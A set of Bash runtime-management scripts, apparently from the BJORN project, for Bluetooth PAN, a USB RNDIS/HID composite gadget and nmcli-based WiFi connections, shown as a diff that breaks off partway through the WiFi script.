if service_exists "$BLUETOOTH_SERVICE"; then
service_active "$BLUETOOTH_SERVICE" && log "SUCCESS" "${BLUETOOTH_SERVICE} is active" || log "WARNING" "${BLUETOOTH_SERVICE} is not active"
service_enabled "$BLUETOOTH_SERVICE" && log "SUCCESS" "${BLUETOOTH_SERVICE} is enabled at boot" || log "WARNING" "${BLUETOOTH_SERVICE} is not enabled at boot"
else
log "ERROR" "${BLUETOOTH_SERVICE} is not installed"
fi
if service_exists "$AUTO_BT_SERVICE"; then
service_active "$AUTO_BT_SERVICE" && log "SUCCESS" "${AUTO_BT_SERVICE} is active" || log "WARNING" "${AUTO_BT_SERVICE} is not active"
service_enabled "$AUTO_BT_SERVICE" && log "SUCCESS" "${AUTO_BT_SERVICE} is enabled at boot" || log "WARNING" "${AUTO_BT_SERVICE} is not enabled at boot"
else
log "ERROR" "${AUTO_BT_SERVICE} is not installed"
fi
[ -f "$AUTO_BT_SCRIPT" ] && log "SUCCESS" "${AUTO_BT_SCRIPT} exists" || log "ERROR" "${AUTO_BT_SCRIPT} is missing"
[ -f "$BT_CONFIG" ] && log "SUCCESS" "${BT_CONFIG} exists" || log "WARNING" "${BT_CONFIG} is missing"
if printf '%s\n' "$controller_info" | grep -q "Powered: yes"; then
log "SUCCESS" "Bluetooth controller is powered on"
else
log "WARNING" "Bluetooth controller is not powered on"
fi
if [ -n "$configured_mac" ]; then
log "INFO" "Configured auto-connect target: ${configured_mac} ($(device_name "$configured_mac"))"
paired="$(device_flag "$configured_mac" "Paired")"
trusted="$(device_flag "$configured_mac" "Trusted")"
connected="$(device_flag "$configured_mac" "Connected")"
log "INFO" "Configured target state: paired=${paired:-unknown}, trusted=${trusted:-unknown}, connected=${connected:-unknown}"
else
log "WARNING" "No auto-connect target configured in ${BT_CONFIG}"
fi
if bnep0_exists; then
log "SUCCESS" "bnep0 interface exists"
ip -brief addr show bnep0 2>/dev/null || true
else
log "WARNING" "bnep0 interface is not present"
fi
print_divider
log "SECTION" "Known Devices"
load_devices all
print_device_list "$configured_mac" || true
print_divider
log "SECTION" "Quick Recovery Hints"
log "INFO" "Use -p for the pairing assistant"
log "INFO" "Use -c to connect now to the configured target"
log "INFO" "Use -r to reset Bluetooth PAN if bnep0 is stuck"
log "INFO" "Follow logs with: sudo journalctl -u ${AUTO_BT_SERVICE} -f"
}
bring_bluetooth_pan_up() {
ensure_root
local configured_mac
print_divider
log "SECTION" "Bringing Bluetooth PAN up"
print_divider
bluetooth_power_on || return 1
configured_mac="$(get_configured_mac 2>/dev/null || true)"
if [ -z "$configured_mac" ]; then
log "WARNING" "No configured target in ${BT_CONFIG}"
log "INFO" "Use the pairing assistant (-p) or set a target from the menu"
fi
if service_exists "$AUTO_BT_SERVICE"; then
systemctl daemon-reload >> "$LOG_FILE" 2>&1 || true
systemctl start "$AUTO_BT_SERVICE" >> "$LOG_FILE" 2>&1 || {
log "ERROR" "Failed to start ${AUTO_BT_SERVICE}"
show_recent_logs
return 1
}
log "SUCCESS" "Start command sent to ${AUTO_BT_SERVICE}"
else
log "ERROR" "${AUTO_BT_SERVICE} is not installed"
return 1
fi
wait_for_condition "${AUTO_BT_SERVICE} to become active" 10 service_active "$AUTO_BT_SERVICE" || true
if [ -n "$configured_mac" ]; then
wait_for_condition "bnep0 to appear" 15 bnep0_exists || true
fi
if bnep0_exists; then
log "SUCCESS" "Bluetooth PAN is up on bnep0"
ip -brief addr show bnep0 2>/dev/null || true
else
log "WARNING" "Bluetooth PAN is not up yet"
fi
}
bring_bluetooth_pan_down() {
ensure_root
local configured_mac
print_divider
log "SECTION" "Bringing Bluetooth PAN down"
print_divider
configured_mac="$(get_configured_mac 2>/dev/null || true)"
disconnect_pan_session "$configured_mac"
}
reset_bluetooth_pan() {
ensure_root
print_divider
log "SECTION" "Resetting Bluetooth PAN"
print_divider
bring_bluetooth_pan_down || log "WARNING" "Down phase reported an issue, continuing"
log "INFO" "Waiting 2 seconds before restart"
sleep 2
bring_bluetooth_pan_up
}
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-u${NC} Bring Bluetooth PAN services up"
echo -e " ${BLUE}-d${NC} Bring Bluetooth PAN services down"
echo -e " ${BLUE}-r${NC} Reset Bluetooth PAN services"
echo -e " ${BLUE}-l${NC} Show detailed Bluetooth status"
echo -e " ${BLUE}-s${NC} Scan nearby Bluetooth devices"
echo -e " ${BLUE}-p${NC} Launch pairing assistant"
echo -e " ${BLUE}-c${NC} Connect now to configured target"
echo -e " ${BLUE}-t${NC} Trust a known device"
echo -e " ${BLUE}-x${NC} Disconnect current PAN session"
echo -e " ${BLUE}-f${NC} Forget/remove a known device"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Examples:"
echo -e " $0 -p Scan, pair, trust, set target, and optionally connect now"
echo -e " $0 -u Start Bluetooth and the auto PAN reconnect service"
echo -e " $0 -r Reset a stuck bnep0/PAN session"
echo -e " $0 -f Forget a previously paired device"
echo -e ""
echo -e "${YELLOW}This script no longer installs or removes Bluetooth PAN.${NC}"
echo -e "${YELLOW}That part is handled by the BJORN installer.${NC}"
if [ "${1:-exit}" = "return" ]; then
return 0
fi
exit 0
}
display_main_menu() {
while true; do
clear
print_divider
echo -e "${CYAN} BJORN Bluetooth Runtime Manager v${SCRIPT_VERSION}${NC}"
print_divider
echo -e "${BLUE} 1.${NC} Show Bluetooth PAN status"
echo -e "${BLUE} 2.${NC} Bring Bluetooth PAN up"
echo -e "${BLUE} 3.${NC} Bring Bluetooth PAN down"
echo -e "${BLUE} 4.${NC} Reset Bluetooth PAN"
echo -e "${BLUE} 5.${NC} Scan nearby Bluetooth devices"
echo -e "${BLUE} 6.${NC} Pairing assistant"
echo -e "${BLUE} 7.${NC} Connect now to configured target"
echo -e "${BLUE} 8.${NC} Set/change auto-connect target"
echo -e "${BLUE} 9.${NC} Trust a known device"
echo -e "${BLUE}10.${NC} Disconnect current PAN session"
echo -e "${BLUE}11.${NC} Forget/remove a known device"
echo -e "${BLUE}12.${NC} Show help"
echo -e "${BLUE}13.${NC} Exit"
echo -e ""
echo -e "${YELLOW}Note:${NC} installation/removal is no longer handled here."
echo -n -e "${GREEN}Choose an option (1-13): ${NC}"
read -r choice
case "$choice" in
1)
list_bluetooth_status
echo ""
read -r -p "Press Enter to return to the menu..."
;;
2)
bring_bluetooth_pan_up
echo ""
read -r -p "Press Enter to return to the menu..."
;;
3)
bring_bluetooth_pan_down
echo ""
read -r -p "Press Enter to return to the menu..."
;;
4)
reset_bluetooth_pan
echo ""
read -r -p "Press Enter to return to the menu..."
;;
5)
scan_bluetooth_devices 12
echo ""
read -r -p "Press Enter to return to the menu..."
;;
6)
pairing_assistant
echo ""
read -r -p "Press Enter to return to the menu..."
;;
7)
connect_to_target_now "$(get_configured_mac 2>/dev/null || true)"
echo ""
read -r -p "Press Enter to return to the menu..."
;;
8)
set_auto_connect_target
echo ""
read -r -p "Press Enter to return to the menu..."
;;
9)
trust_selected_device
echo ""
read -r -p "Press Enter to return to the menu..."
;;
10)
disconnect_pan_session "$(get_configured_mac 2>/dev/null || true)"
echo ""
read -r -p "Press Enter to return to the menu..."
;;
11)
forget_device
echo ""
read -r -p "Press Enter to return to the menu..."
;;
12)
show_usage return
echo ""
read -r -p "Press Enter to return to the menu..."
;;
13)
log "INFO" "Exiting BJORN Bluetooth Runtime Manager"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1 and 13."
sleep 2
;;
esac
done
}
while getopts ":udrlspctxfh" opt; do
case "$opt" in
u)
bring_bluetooth_pan_up
exit $?
;;
d)
bring_bluetooth_pan_down
exit $?
;;
r)
reset_bluetooth_pan
exit $?
;;
l)
list_bluetooth_status
exit 0
;;
s)
scan_bluetooth_devices 12
exit $?
;;
p)
pairing_assistant
exit $?
;;
c)
connect_to_target_now "$(get_configured_mac 2>/dev/null || true)"
exit $?
;;
t)
trust_selected_device
exit $?
;;
x)
disconnect_pan_session "$(get_configured_mac 2>/dev/null || true)"
exit $?
;;
f)
forget_device
exit $?
;;
h)
show_usage
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

bjorn_usb_gadget.sh (new file, 430 lines)

@@ -0,0 +1,430 @@
#!/bin/bash
# bjorn_usb_gadget.sh
# Runtime manager for the BJORN USB composite gadget
# Usage:
# ./bjorn_usb_gadget.sh -u Bring the gadget up
# ./bjorn_usb_gadget.sh -d Bring the gadget down
# ./bjorn_usb_gadget.sh -r Reset the gadget (down + up)
# ./bjorn_usb_gadget.sh -l Show detailed status
# ./bjorn_usb_gadget.sh -h Show help
#
# Notes:
# This script no longer installs or removes the USB gadget stack.
# Installation is handled by the BJORN installer.
# This tool is for runtime diagnostics and recovery only.
set -u
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m'
SCRIPT_VERSION="2.0"
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_usb_gadget_$(date +%Y%m%d_%H%M%S).log"
USB_GADGET_SERVICE="usb-gadget.service"
USB_GADGET_SCRIPT="/usr/local/bin/usb-gadget.sh"
DNSMASQ_SERVICE="dnsmasq.service"
DNSMASQ_CONFIG="/etc/dnsmasq.d/usb0"
MODULES_LOAD_FILE="/etc/modules-load.d/usb-gadget.conf"
MODULES_FILE="/etc/modules"
INTERFACES_FILE="/etc/network/interfaces"
mkdir -p "$LOG_DIR" 2>/dev/null || true
touch "$LOG_FILE" 2>/dev/null || true
log() {
local level="$1"
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
local color="$NC"
case "$level" in
ERROR) color="$RED" ;;
SUCCESS) color="$GREEN" ;;
WARNING) color="$YELLOW" ;;
INFO) color="$BLUE" ;;
SECTION) color="$CYAN" ;;
esac
printf '%s\n' "$message" >> "$LOG_FILE" 2>/dev/null || true
printf '%b%s%b\n' "$color" "$message" "$NC"
}
show_recent_logs() {
if command -v journalctl >/dev/null 2>&1 && systemctl list-unit-files --type=service | grep -q "^${USB_GADGET_SERVICE}"; then
log "INFO" "Recent ${USB_GADGET_SERVICE} logs:"
journalctl -u "$USB_GADGET_SERVICE" -n 20 --no-pager 2>/dev/null || true
fi
}
ensure_root() {
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This command must be run as root. Please use sudo."
exit 1
fi
}
service_exists() {
systemctl list-unit-files --type=service 2>/dev/null | grep -q "^$1"
}
service_active() {
systemctl is-active --quiet "$1"
}
service_enabled() {
systemctl is-enabled --quiet "$1"
}
usb0_exists() {
ip link show usb0 >/dev/null 2>&1
}
print_divider() {
printf '%b%s%b\n' "$CYAN" "============================================================" "$NC"
}
detect_boot_paths() {
local cmdline=""
local config=""
if [ -f /boot/firmware/cmdline.txt ]; then
cmdline="/boot/firmware/cmdline.txt"
elif [ -f /boot/cmdline.txt ]; then
cmdline="/boot/cmdline.txt"
fi
if [ -f /boot/firmware/config.txt ]; then
config="/boot/firmware/config.txt"
elif [ -f /boot/config.txt ]; then
config="/boot/config.txt"
fi
printf '%s|%s\n' "$cmdline" "$config"
}
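`detect_boot_paths` returns both paths in a single `a|b` string, which the caller splits with parameter expansion: `${pair%%|*}` strips the longest `|*` suffix (keeping the part before the first `|`), and `${pair##*|}` strips the longest `*|` prefix (keeping the part after the last `|`):

```shell
# Split a "cmdline|config" pair the way list_usb_gadget_info does
pair="/boot/firmware/cmdline.txt|/boot/firmware/config.txt"
cmdline_file="${pair%%|*}"   # everything before the first '|'
config_file="${pair##*|}"    # everything after the last '|'
printf '%s\n%s\n' "$cmdline_file" "$config_file"
```

With exactly one `|` in the string the two expansions partition it cleanly; either half may be empty when the corresponding boot file was not found.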
wait_for_condition() {
local description="$1"
local attempts="$2"
shift 2
local i=1
while [ "$i" -le "$attempts" ]; do
if "$@"; then
log "SUCCESS" "$description"
return 0
fi
log "INFO" "Waiting for $description ($i/$attempts)..."
sleep 1
i=$((i + 1))
done
log "WARNING" "$description not reached after ${attempts}s"
return 1
}
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-u${NC} Bring USB Gadget up"
echo -e " ${BLUE}-d${NC} Bring USB Gadget down"
echo -e " ${BLUE}-r${NC} Reset USB Gadget (down + up)"
echo -e " ${BLUE}-l${NC} List detailed USB Gadget status"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Examples:"
echo -e " $0 -u Start the BJORN composite gadget"
echo -e " $0 -d Stop the BJORN composite gadget cleanly"
echo -e " $0 -r Reinitialize the gadget if RNDIS/HID is stuck"
echo -e " $0 -l Show services, usb0, /dev/hidg*, and boot config"
echo -e ""
echo -e "${YELLOW}This script no longer installs or removes USB Gadget.${NC}"
echo -e "${YELLOW}That part is handled by the BJORN installer.${NC}"
if [ "${1:-exit}" = "return" ]; then
return 0
fi
exit 0
}
list_usb_gadget_info() {
local boot_pair
local cmdline_file
local config_file
boot_pair="$(detect_boot_paths)"
cmdline_file="${boot_pair%%|*}"
config_file="${boot_pair##*|}"
print_divider
log "SECTION" "BJORN USB Gadget Status"
print_divider
log "INFO" "Expected layout: RNDIS usb0 + HID keyboard /dev/hidg0 + HID mouse /dev/hidg1"
log "INFO" "Script version: ${SCRIPT_VERSION}"
log "INFO" "Log file: ${LOG_FILE}"
print_divider
log "SECTION" "Service Status"
if service_exists "$USB_GADGET_SERVICE"; then
service_active "$USB_GADGET_SERVICE" && log "SUCCESS" "${USB_GADGET_SERVICE} is active" || log "WARNING" "${USB_GADGET_SERVICE} is not active"
service_enabled "$USB_GADGET_SERVICE" && log "SUCCESS" "${USB_GADGET_SERVICE} is enabled at boot" || log "WARNING" "${USB_GADGET_SERVICE} is not enabled at boot"
else
log "ERROR" "${USB_GADGET_SERVICE} is not installed on this system"
fi
if service_exists "$DNSMASQ_SERVICE"; then
service_active "$DNSMASQ_SERVICE" && log "SUCCESS" "${DNSMASQ_SERVICE} is active" || log "WARNING" "${DNSMASQ_SERVICE} is not active"
else
log "WARNING" "${DNSMASQ_SERVICE} is not installed"
fi
print_divider
log "SECTION" "Runtime Files"
[ -x "$USB_GADGET_SCRIPT" ] && log "SUCCESS" "${USB_GADGET_SCRIPT} is present and executable" || log "ERROR" "${USB_GADGET_SCRIPT} is missing or not executable"
[ -c /dev/hidg0 ] && log "SUCCESS" "/dev/hidg0 (keyboard) is available" || log "WARNING" "/dev/hidg0 (keyboard) is not present"
[ -c /dev/hidg1 ] && log "SUCCESS" "/dev/hidg1 (mouse) is available" || log "WARNING" "/dev/hidg1 (mouse) is not present"
if ip link show usb0 >/dev/null 2>&1; then
log "SUCCESS" "usb0 network interface exists"
ip -brief addr show usb0 2>/dev/null || true
else
log "WARNING" "usb0 network interface is missing"
fi
if [ -d /sys/kernel/config/usb_gadget/g1 ]; then
log "SUCCESS" "Composite gadget directory exists: /sys/kernel/config/usb_gadget/g1"
find /sys/kernel/config/usb_gadget/g1/functions -maxdepth 1 -mindepth 1 -type d 2>/dev/null || true
else
log "WARNING" "No active gadget directory found under /sys/kernel/config/usb_gadget/g1"
fi
print_divider
log "SECTION" "Boot Configuration"
if [ -n "$cmdline_file" ] && [ -f "$cmdline_file" ]; then
grep -q "modules-load=dwc2" "$cmdline_file" && log "SUCCESS" "dwc2 boot module load is configured in ${cmdline_file}" || log "WARNING" "dwc2 boot module load not found in ${cmdline_file}"
else
log "WARNING" "cmdline.txt not found"
fi
if [ -n "$config_file" ] && [ -f "$config_file" ]; then
grep -q "^dtoverlay=dwc2" "$config_file" && log "SUCCESS" "dtoverlay=dwc2 is present in ${config_file}" || log "WARNING" "dtoverlay=dwc2 not found in ${config_file}"
else
log "WARNING" "config.txt not found"
fi
[ -f "$DNSMASQ_CONFIG" ] && log "SUCCESS" "${DNSMASQ_CONFIG} exists" || log "WARNING" "${DNSMASQ_CONFIG} is missing"
[ -f "$MODULES_LOAD_FILE" ] && log "INFO" "${MODULES_LOAD_FILE} exists (64-bit style module loading)"
[ -f "$MODULES_FILE" ] && grep -q "^libcomposite" "$MODULES_FILE" && log "INFO" "libcomposite is referenced in ${MODULES_FILE}"
[ -f "$INTERFACES_FILE" ] && grep -q "^allow-hotplug usb0" "$INTERFACES_FILE" && log "INFO" "usb0 legacy interface config detected in ${INTERFACES_FILE}"
print_divider
log "SECTION" "Quick Recovery Hints"
log "INFO" "If RNDIS or HID is stuck, run: sudo $0 -r"
log "INFO" "If startup still fails, inspect logs with: sudo journalctl -u ${USB_GADGET_SERVICE} -f"
log "INFO" "If HID nodes never appear after installer changes, a reboot may still be required"
}
bring_usb_gadget_down() {
ensure_root
print_divider
log "SECTION" "Bringing USB gadget down"
print_divider
if service_exists "$USB_GADGET_SERVICE"; then
if service_active "$USB_GADGET_SERVICE"; then
log "INFO" "Stopping ${USB_GADGET_SERVICE}..."
if systemctl stop "$USB_GADGET_SERVICE"; then
log "SUCCESS" "Stopped ${USB_GADGET_SERVICE}"
else
log "ERROR" "Failed to stop ${USB_GADGET_SERVICE}"
show_recent_logs
return 1
fi
else
log "INFO" "${USB_GADGET_SERVICE} is already stopped"
fi
else
log "WARNING" "${USB_GADGET_SERVICE} is not installed, trying direct runtime cleanup"
if [ -x "$USB_GADGET_SCRIPT" ]; then
"$USB_GADGET_SCRIPT" stop >> "$LOG_FILE" 2>&1 || true
fi
fi
if [ -x "$USB_GADGET_SCRIPT" ] && [ -d /sys/kernel/config/usb_gadget/g1 ]; then
log "INFO" "Running direct gadget cleanup via ${USB_GADGET_SCRIPT} stop"
"$USB_GADGET_SCRIPT" stop >> "$LOG_FILE" 2>&1 || log "WARNING" "Direct cleanup reported a non-fatal issue"
fi
if ip link show usb0 >/dev/null 2>&1; then
log "INFO" "Bringing usb0 interface down"
ip link set usb0 down >> "$LOG_FILE" 2>&1 || log "WARNING" "usb0 could not be forced down (often harmless)"
else
log "INFO" "usb0 is already absent"
fi
[ -c /dev/hidg0 ] && log "WARNING" "/dev/hidg0 still exists after stop (may clear on next start/reboot)" || log "SUCCESS" "/dev/hidg0 is no longer exposed"
[ -c /dev/hidg1 ] && log "WARNING" "/dev/hidg1 still exists after stop (may clear on next start/reboot)" || log "SUCCESS" "/dev/hidg1 is no longer exposed"
ip link show usb0 >/dev/null 2>&1 && log "WARNING" "usb0 still exists after stop" || log "SUCCESS" "usb0 is no longer present"
}
bring_usb_gadget_up() {
ensure_root
print_divider
log "SECTION" "Bringing USB gadget up"
print_divider
if [ ! -x "$USB_GADGET_SCRIPT" ]; then
log "ERROR" "${USB_GADGET_SCRIPT} is missing. The gadget runtime is not installed."
return 1
fi
if service_exists "$USB_GADGET_SERVICE"; then
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload >> "$LOG_FILE" 2>&1 || log "WARNING" "systemd daemon-reload reported an issue"
log "INFO" "Starting ${USB_GADGET_SERVICE}..."
if systemctl start "$USB_GADGET_SERVICE"; then
log "SUCCESS" "Start command sent to ${USB_GADGET_SERVICE}"
else
log "ERROR" "Failed to start ${USB_GADGET_SERVICE}"
show_recent_logs
return 1
fi
else
log "WARNING" "${USB_GADGET_SERVICE} is not installed, running ${USB_GADGET_SCRIPT} directly"
if "$USB_GADGET_SCRIPT" >> "$LOG_FILE" 2>&1; then
log "SUCCESS" "Runtime script executed directly"
else
log "ERROR" "Runtime script failed"
return 1
fi
fi
wait_for_condition "${USB_GADGET_SERVICE} to become active" 10 service_active "$USB_GADGET_SERVICE" || true
wait_for_condition "usb0 to appear" 12 usb0_exists || true
if service_exists "$DNSMASQ_SERVICE"; then
log "INFO" "Restarting ${DNSMASQ_SERVICE} to refresh DHCP on usb0"
systemctl restart "$DNSMASQ_SERVICE" >> "$LOG_FILE" 2>&1 || log "WARNING" "Failed to restart ${DNSMASQ_SERVICE}"
fi
[ -c /dev/hidg0 ] && log "SUCCESS" "/dev/hidg0 (keyboard) is ready" || log "WARNING" "/dev/hidg0 not present yet"
[ -c /dev/hidg1 ] && log "SUCCESS" "/dev/hidg1 (mouse) is ready" || log "WARNING" "/dev/hidg1 not present yet"
if ip link show usb0 >/dev/null 2>&1; then
log "SUCCESS" "usb0 is present"
ip -brief addr show usb0 2>/dev/null || true
else
log "WARNING" "usb0 is still missing after startup"
fi
log "INFO" "If HID is still missing after a clean start, a reboot can still be required depending on the board/kernel state"
}
reset_usb_gadget() {
ensure_root
print_divider
log "SECTION" "Resetting USB gadget (down + up)"
print_divider
bring_usb_gadget_down || log "WARNING" "Down phase reported an issue, continuing with recovery"
log "INFO" "Waiting 2 seconds before bringing the gadget back up"
sleep 2
bring_usb_gadget_up
}
display_main_menu() {
while true; do
clear
print_divider
echo -e "${CYAN} BJORN USB Gadget Runtime Manager v${SCRIPT_VERSION}${NC}"
print_divider
echo -e "${BLUE} 1.${NC} Bring USB Gadget up"
echo -e "${BLUE} 2.${NC} Bring USB Gadget down"
echo -e "${BLUE} 3.${NC} Reset USB Gadget (down + up)"
echo -e "${BLUE} 4.${NC} List detailed USB Gadget status"
echo -e "${BLUE} 5.${NC} Show help"
echo -e "${BLUE} 6.${NC} Exit"
echo -e ""
echo -e "${YELLOW}Note:${NC} installation/removal is no longer handled here."
echo -n -e "${GREEN}Choose an option (1-6): ${NC}"
read -r choice
case "$choice" in
1)
bring_usb_gadget_up
echo ""
read -r -p "Press Enter to return to the menu..."
;;
2)
bring_usb_gadget_down
echo ""
read -r -p "Press Enter to return to the menu..."
;;
3)
reset_usb_gadget
echo ""
read -r -p "Press Enter to return to the menu..."
;;
4)
list_usb_gadget_info
echo ""
read -r -p "Press Enter to return to the menu..."
;;
5)
show_usage return
echo ""
read -r -p "Press Enter to return to the menu..."
;;
6)
log "INFO" "Exiting BJORN USB Gadget Runtime Manager"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1 and 6."
sleep 2
;;
esac
done
}
while getopts ":udrlhf" opt; do
case "$opt" in
u)
bring_usb_gadget_up
exit $?
;;
d)
bring_usb_gadget_down
exit $?
;;
r)
reset_usb_gadget
exit $?
;;
l)
list_usb_gadget_info
exit 0
;;
h)
show_usage
;;
f)
log "ERROR" "Option -f (install) has been removed. Use -u to bring the gadget up or -r to reset it."
show_usage
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

786
bjorn_wifi.sh Normal file
View File

@@ -0,0 +1,786 @@
#!/bin/bash
# WiFi Manager Script Using nmcli
# Author: Infinition
# Version: 1.6
# Description: This script provides a simple menu interface to manage WiFi connections using nmcli.
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
PURPLE='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
case $level in
"INFO") echo -e "${GREEN}[INFO]${NC} $*" ;;
"WARN") echo -e "${YELLOW}[WARN]${NC} $*" ;;
"ERROR") echo -e "${RED}[ERROR]${NC} $*" ;;
"DEBUG") echo -e "${BLUE}[DEBUG]${NC} $*" ;;
esac
}
# ============================================================
# Check if Script is Run as Root
# ============================================================
if [ "$EUID" -ne 0 ]; then
log "ERROR" "This script must be run as root."
exit 1
fi
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e " ${BLUE}-f${NC} Force refresh of WiFi connections"
echo -e " ${BLUE}-c${NC} Clear all saved WiFi connections"
echo -e " ${BLUE}-l${NC} List all available WiFi networks"
echo -e " ${BLUE}-s${NC} Show current WiFi status"
echo -e " ${BLUE}-a${NC} Add a new WiFi connection"
echo -e " ${BLUE}-d${NC} Delete a WiFi connection"
echo -e " ${BLUE}-m${NC} Manage WiFi Connections"
echo -e ""
echo -e "Example: $0 -a"
exit 1
}
# ============================================================
# Function to Check Prerequisites
# ============================================================
check_prerequisites() {
log "INFO" "Checking prerequisites..."
local missing_packages=()
# Check if nmcli is installed
if ! command -v nmcli &> /dev/null; then
missing_packages+=("network-manager")
fi
# Check if NetworkManager service is running
if ! systemctl is-active --quiet NetworkManager; then
log "WARN" "NetworkManager service is not running. Attempting to start it..."
systemctl start NetworkManager
sleep 2
if ! systemctl is-active --quiet NetworkManager; then
log "ERROR" "Failed to start NetworkManager. Please install and start it manually."
exit 1
else
log "INFO" "NetworkManager started successfully."
fi
fi
# Install missing packages if any
if [ ${#missing_packages[@]} -gt 0 ]; then
log "WARN" "Missing packages: ${missing_packages[*]}"
log "INFO" "Attempting to install missing packages..."
apt-get update
apt-get install -y "${missing_packages[@]}"
# Verify installation
for package in "${missing_packages[@]}"; do
if ! dpkg -l | grep -q "^ii.*$package"; then
log "ERROR" "Failed to install $package."
exit 1
fi
done
fi
log "INFO" "All prerequisites are met."
}
# ============================================================
# Function to Handle preconfigured.nmconnection
# ============================================================
handle_preconfigured_connection() {
preconfigured_file="/etc/NetworkManager/system-connections/preconfigured.nmconnection"
if [ -f "$preconfigured_file" ]; then
echo -e "${YELLOW}A preconfigured WiFi connection exists (preconfigured.nmconnection).${NC}"
echo -n -e "${GREEN}Do you want to delete it and recreate connections with individual SSIDs? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
# Extract SSID from preconfigured.nmconnection
ssid=$(grep "^ssid=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
if [ -z "$ssid" ]; then
log "WARN" "SSID not found in preconfigured.nmconnection. Cannot recreate connection."
else
# Extract security type
security=$(grep "^security=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
# Delete preconfigured.nmconnection
log "INFO" "Deleting preconfigured.nmconnection..."
rm "$preconfigured_file"
systemctl restart NetworkManager
sleep 2
# Recreate the connection with SSID name
echo -n -e "${GREEN}Do you want to recreate the connection for SSID '$ssid'? (y/n): ${NC}"
read recreate_confirm
if [[ "$recreate_confirm" =~ ^[Yy]$ ]]; then
# Check if connection already exists
if nmcli connection show "$ssid" &> /dev/null; then
log "WARN" "A connection named '$ssid' already exists."
else
# Prompt for password if necessary
if [ "$security" == "none" ] || [ "$security" == "--" ] || [ -z "$security" ]; then
# Open network
log "INFO" "Creating open connection for SSID '$ssid'..."
nmcli device wifi connect "$ssid" name "$ssid"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid': ${NC}"
read -r -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
else
log "INFO" "Creating secured connection for SSID '$ssid'..."
nmcli device wifi connect "$ssid" password "$password" name "$ssid"
fi
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully recreated connection for '$ssid'."
else
log "ERROR" "Failed to recreate connection for '$ssid'."
fi
fi
else
log "INFO" "Connection recreation cancelled."
fi
fi
else
log "INFO" "Preconfigured connection retained."
fi
fi
}
# ============================================================
# Function to List All Available WiFi Networks and Connect
# ============================================================
list_wifi_and_connect() {
log "INFO" "Scanning for available WiFi networks..."
nmcli device wifi rescan
sleep 2
while true; do
clear
available_networks=$(nmcli -t -f SSID,SECURITY device wifi list)
if [ -z "$available_networks" ]; then
log "WARN" "No WiFi networks found."
echo ""
else
# Remove lines with empty SSIDs (hidden networks)
network_list=$(echo "$available_networks" | grep -v '^:$')
if [ -z "$network_list" ]; then
log "WARN" "No visible WiFi networks found."
echo ""
else
echo -e "${CYAN}Available WiFi Networks:${NC}"
declare -A SSIDs=()        # reset on every refresh so stale indices disappear
declare -A SECURITIES=()
index=1
while IFS=: read -r ssid security; do
# Handle hidden SSIDs
if [ -z "$ssid" ]; then
ssid="<Hidden SSID>"
fi
SSIDs["$index"]="$ssid"
SECURITIES["$index"]="$security"
printf "%d. %-40s (%s)\n" "$index" "$ssid" "$security"
index=$((index + 1))
done <<< "$network_list"
fi
fi
echo ""
echo -e "${YELLOW}The list refreshes every 5 seconds. Enter a network number or 'c' to connect, or 'q' to quit.${NC}"
echo -n -e "${GREEN}Enter choice (number/c/q): ${NC}"
read -t 5 input
if [ $? -eq 0 ]; then
if [[ "$input" =~ ^[Qq]$ ]]; then
log "INFO" "Exiting WiFi list."
return
elif [[ "$input" =~ ^[Cc]$ ]]; then
echo ""
echo -n -e "${GREEN}Enter the number of the network to connect: ${NC}"
read -r selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
continue
fi
elif [[ "$input" =~ ^[0-9]+$ ]]; then
selection="$input"
else
log "ERROR" "Invalid input."
sleep 2
continue
fi
# Shared connect path for both entry modes
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
ssid_selected="${SSIDs[$selection]}"
security_selected="${SECURITIES[$selection]}"
echo -n -e "${GREEN}Do you want to connect to '$ssid_selected'? (y/n): ${NC}"
read -r confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
if [ "$security_selected" == "--" ] || [ -z "$security_selected" ]; then
# Open network
log "INFO" "Connecting to open network '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" name "$ssid_selected"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid_selected': ${NC}"
read -r -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
sleep 2
continue
fi
